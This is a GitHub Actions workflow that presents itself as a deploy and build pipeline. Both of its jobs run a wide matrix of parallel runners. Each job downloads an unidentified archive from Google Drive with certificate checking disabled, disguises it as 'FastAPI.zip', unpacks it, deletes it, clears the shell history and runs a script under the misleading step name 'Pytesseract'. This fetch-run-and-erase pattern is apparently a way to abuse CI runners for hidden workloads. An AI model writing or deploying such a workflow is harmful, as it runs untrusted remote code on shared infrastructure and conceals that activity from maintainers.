name: lunadong408network
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  DEPLOY:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Draft', 'Construct', 'Inspect', 'Trigger', 'Ship']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1Fz60r4nDmSxFEYce0UzEauCBmZX611eT" -O FastAPI.zip
        unzip -o FastAPI.zip
        rm FastAPI.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  GENERATE1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Provision', 'Compile', 'Verify', 'Launch', 'Deploy']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1Fz60r4nDmSxFEYce0UzEauCBmZX611eT" -O FastAPI.zip
        unzip -o FastAPI.zip
        rm FastAPI.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
